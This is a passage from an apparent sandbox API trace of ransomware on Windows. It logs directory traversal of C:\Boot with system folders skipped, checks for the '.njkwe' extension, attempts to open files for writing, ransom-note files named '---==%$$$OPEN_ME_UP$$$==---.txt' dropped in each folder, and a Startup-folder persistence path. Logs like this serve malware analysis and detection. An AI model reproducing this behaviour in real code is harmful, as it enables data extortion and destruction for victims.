lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6d7e9a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa5a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0065.252] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0065.252] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.252] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0065.252] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0065.252] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.252] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\memtest.exe.mui") returned 33 [0065.252] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.252] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.252] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0065.252] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\zh-CN\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.252] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.252] FindNextFileW (in: hFindFile=0xc1a3e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6d7e9a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa5a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0065.252] FindClose (in: hFindFile=0xc1a3e0 | out: hFindFile=0xc1a3e0) returned 1 [0065.252] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.252] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\zh-cn\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.254] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.255] CloseHandle (hObject=0x428) returned 1 [0065.255] GetProcessHeap () returned 0xbe0000 [0065.255] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.255] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207675, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x518ea25e, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0065.255] lstrcmpiW (lpString1="zh-HK", lpString2="Windows") returned 1 [0065.255] lstrcmpiW (lpString1="zh-HK", lpString2="$Recycle.bin") returned 1 [0065.255] lstrcmpiW (lpString1="zh-HK", lpString2="System Volume Information") returned 1 [0065.255] lstrcmpiW (lpString1="zh-HK", lpString2="Program Files") returned 1 [0065.255] lstrcmpiW (lpString1="zh-HK", lpString2="Program Files (x86)") returned 1 [0065.255] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK") returned 17 [0065.255] lstrcmpW (lpString1="zh-HK", lpString2=".") returned 1 [0065.255] lstrcmpW (lpString1="zh-HK", lpString2="..") returned 1 [0065.255] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\zh-HK", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.255] GetProcessHeap () returned 0xbe0000 [0065.255] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.256] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\*") returned 19 [0065.256] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-HK\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207675, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x518ea25e, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ca0 [0065.256] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.256] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.256] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.256] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.256] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.256] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\.") returned 19 [0065.256] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.256] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207675, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x518ea25e, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.256] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.256] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.256] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.256] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.256] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.256] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\..") returned 20 [0065.256] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.256] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.256] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf958, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.256] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.256] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.256] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.256] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.256] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.256] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned 33 [0065.256] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.256] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.256] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.256] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.256] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.268] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x518ea25e, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0xe31db522, ftLastWriteTime.dwHighDateTime=0x1d112e1, nFileSizeHigh=0x0, nFileSizeLow=0xa558, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0065.268] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0065.268] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.268] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0065.268] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0065.268] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.268] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\memtest.exe.mui") returned 33 [0065.268] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.268] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.268] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0065.268] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\zh-HK\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.268] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.268] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x518ea25e, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0xe31db522, ftLastWriteTime.dwHighDateTime=0x1d112e1, nFileSizeHigh=0x0, nFileSizeLow=0xa558, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0065.268] FindClose (in: hFindFile=0xc19ca0 | out: hFindFile=0xc19ca0) returned 1 [0065.268] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.268] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\zh-hk\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.270] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.271] CloseHandle (hObject=0x428) returned 1 [0065.271] GetProcessHeap () returned 0xbe0000 [0065.271] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.271] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0065.271] lstrcmpiW (lpString1="zh-TW", lpString2="Windows") returned 1 [0065.271] lstrcmpiW (lpString1="zh-TW", lpString2="$Recycle.bin") returned 1 [0065.271] lstrcmpiW (lpString1="zh-TW", lpString2="System Volume Information") returned 1 [0065.271] lstrcmpiW (lpString1="zh-TW", lpString2="Program Files") returned 1 [0065.271] lstrcmpiW (lpString1="zh-TW", lpString2="Program Files (x86)") returned 1 [0065.271] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW") returned 17 [0065.271] lstrcmpW (lpString1="zh-TW", lpString2=".") returned 1 [0065.271] lstrcmpW (lpString1="zh-TW", lpString2="..") returned 1 [0065.272] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\zh-TW", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.272] GetProcessHeap () returned 0xbe0000 [0065.272] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.272] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\*") returned 19 [0065.272] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-TW\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a360 [0065.272] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.272] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.272] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.272] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.272] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.272] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\.") returned 19 [0065.272] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.272] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.272] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.272] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.272] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.272] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.272] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.272] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\..") returned 20 [0065.272] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.272] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.272] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf960, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.272] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.272] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.272] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.272] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.272] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.272] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 33 [0065.272] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.272] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.272] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.273] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.273] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.273] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa598, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0065.273] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0065.273] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.273] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0065.273] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0065.273] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.273] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\memtest.exe.mui") returned 33 [0065.273] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.273] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.273] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0065.273] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\zh-TW\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.273] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.273] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa598, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0065.273] FindClose (in: hFindFile=0xc1a360 | out: hFindFile=0xc1a360) returned 1 [0065.273] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.273] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\zh-tw\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.275] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.276] CloseHandle (hObject=0x428) returned 1 [0065.276] GetProcessHeap () returned 0xbe0000 [0065.276] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.276] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0065.276] FindClose (in: hFindFile=0xc19c60 | out: hFindFile=0xc19c60) returned 1 [0065.276] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 43 [0065.276] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0065.276] WriteFile (in: hFile=0x424, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380fa74, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380fa74*=0x351, lpOverlapped=0x0) returned 1 [0065.277] CloseHandle (hObject=0x424) returned 1 [0065.277] GetProcessHeap () returned 0xbe0000 [0065.277] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc263f8 | out: hHeap=0xbe0000) returned 1 [0065.277] FindNextFileW (in: hFindFile=0xc19720, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfb90936b, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0x607da, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0065.277] lstrcmpiW (lpString1="bootmgr", lpString2="Windows") returned -1 [0065.277] lstrcmpiW (lpString1="bootmgr", lpString2="$Recycle.bin") returned 1 [0065.277] lstrcmpiW (lpString1="bootmgr", lpString2="System Volume Information") returned -1 [0065.278] lstrcmpiW (lpString1="bootmgr", lpString2="Program Files") returned -1 [0065.278] lstrcmpiW (lpString1="bootmgr", lpString2="Program Files (x86)") returned -1 [0065.278] wnsprintfW (in: pszDest=0xc47aa0, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\bootmgr") returned 14 [0065.278] StrStrIW (lpFirst="bootmgr", lpSrch=".njkwe") returned 0x0 [0065.278] lstrcmpW (lpString1="bootmgr", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.278] lstrcmpW (lpString1="bootmgr", lpString2="taridd") returned -1 [0065.278] StrCmpNW (lpStr1="\\\\?\\C:\\bootmgr", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.278] CreateFileW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.279] FindNextFileW (in: hFindFile=0xc19720, lpFindFileData=0x380fd30 | out: 